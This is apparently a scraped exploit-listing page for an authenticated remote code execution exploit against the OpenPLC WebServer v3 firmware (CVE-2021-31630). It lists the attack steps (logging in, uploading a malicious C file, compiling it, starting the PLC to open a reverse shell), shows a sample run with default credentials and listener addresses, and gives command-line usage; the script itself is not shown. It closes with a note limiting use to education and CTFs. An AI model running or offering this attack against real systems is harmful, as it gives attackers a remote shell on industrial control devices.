Exploit for Code Injection in Openplcproject Openplc V3 Firmware CVE-2021-31630

## https://sploitus.com/exploit?id=872648BF-E458-5561-8C1C-2780950110B3
# OpenPLC WebServer v3 - Authenticated RCE (CVE-2021-31630)
---
This exploit is based on the exploit from [Exploit-DB](https://www.exploit-db.com/exploits/49803) made by [Fellipe Oliveira](https://www.exploit-db.com/?author=11060).

- First, authenticate
- Upload a malicious C file
- Compile it
- Start the PLC (initiate reverse shell)
- Stop the PLC (no need to run it, the reverse shell is already initiated)

```
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
```

## How to use
```
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
```
Options:
- `--url` - URL of the OpenPLC
- `--username` - username
- `--password` - password
- `--listenerip` - IP address of the listener
- `--listenerport` - port of the listener

> **_NOTE:_** This exploit is created as a PoC; use it only for educational purposes or CTFs - https://flojboj.org/article/WifineticTwo